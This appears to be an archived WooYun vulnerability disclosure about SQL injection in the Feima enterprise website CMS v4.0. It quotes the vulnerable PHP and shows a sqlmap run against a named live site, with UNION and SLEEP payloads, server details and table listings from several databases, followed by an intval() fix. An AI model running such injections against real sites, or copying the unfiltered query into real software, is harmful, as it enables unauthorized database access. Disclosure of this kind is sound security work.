乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-18: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-04-18: 厂商已经主动忽略漏洞,细节向公众公开
飞马企业网站系统 v4.0http://www.feima123.com/安康飞马网络SQL注射,演示站点为http://www.akzjmzx.com
<?php $id = $_REQUEST['id']; //get post 通吃include("include/conn.php");$queryImg="select * from hyimg_table where id=$id"; //无过滤直接进查询$resultImg=mysql_query($queryImg); //查了$rowImg = mysql_fetch_array($resultImg);//不用往下看了
C:\Users\Administrator>sqlmap.py -u "http://www.akzjmzx.com/tpxx.php?id=26" --tables
只跑了表证明危害,足矣
sqlmap identified the following injection points with a total of 90 HTTP(s) requests:---Place: GETParameter: id Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: id=-1995 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626f71,0x7554664d79484e636767,0x71626d6871),NULL,NULL,NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=26 AND SLEEP(5)---web server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17back-end DBMS: MySQL 5.0.11Database: aklhw_data[7 tables]+----------------------------------------------+| anli_table || anlifenlei_table || jianjie_table || lianxi_table || liuyan_table || news_table || sysadmin_table |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: wlmq107[7 tables]+----------------------------------------------+| mbaojian_table || mcaidan_table || mjianjie_table || mlogo_table || mxinxi_table || mzhanghao_table || sysadmin_table |+----------------------------------------------+Database: wd0123[14 tables]+----------------------------------------------+| hybanner_table || hyimg_table || hyimgfenlei_table || hyjieshao_table || hyjsimg_table || hykefu_table || hyliuyan_table || hynews_table || hynewsfenlei_table || hyseo_table || hytopimg_table || hyxinxi_table || hyzhanghao_table || hyzhaopin_table |+----------------------------------------------+Database: feimanet[16 tables]+----------------------------------------------+| bangding_table || hybanner_table || hyimg_table || hyimgfenlei_table || hyjieshao_table || hyjsimg_table || hykefu_table || hyliuyan_table || hynews_table || hynewsfenlei_table || hyseo_table || hytopimg_table || hyxinxi_table || hyzhanghao_table || hyzhaopin_table || sysadmin_table |+----------------------------------------------+Database: feima123[3 tables]+----------------------------------------------+| anli_table || dongtai_table || sysadmin_table |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: qixiangju[11 tables]+----------------------------------------------+| dflz_table || dwgk_table || fzjz_table || kjfw_table || lianxi_table || qxyw_table || sysadmin_table || tqyb_table || xdh_table || xjdt_table || zcfg_table |+----------------------------------------------+Database: akzjmzx[14 tables]+----------------------------------------------+| hybanner_table || hyimg_table || hyimgfenlei_table || hyjieshao_table || hyjsimg_table || hykefu_table || hyliuyan_table || hynews_table || hynewsfenlei_table || hyseo_table || hytopimg_table || hyxinxi_table || hyzhanghao_table || hyzhaopin_table |+----------------------------------------------+Database: information_schema[37 tables]+----------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------------------------+
<?php $id = $_REQUEST['id']; //get post 通吃//添加以下语句$id = intval($id);//添加以上语句include("include/conn.php");$queryImg="select * from hyimg_table where id=$id"; //无过滤直接进查询$resultImg=mysql_query($queryImg); //查了$rowImg = mysql_fetch_array($resultImg);//不用往下看了
未能联系到厂商或者厂商积极拒绝
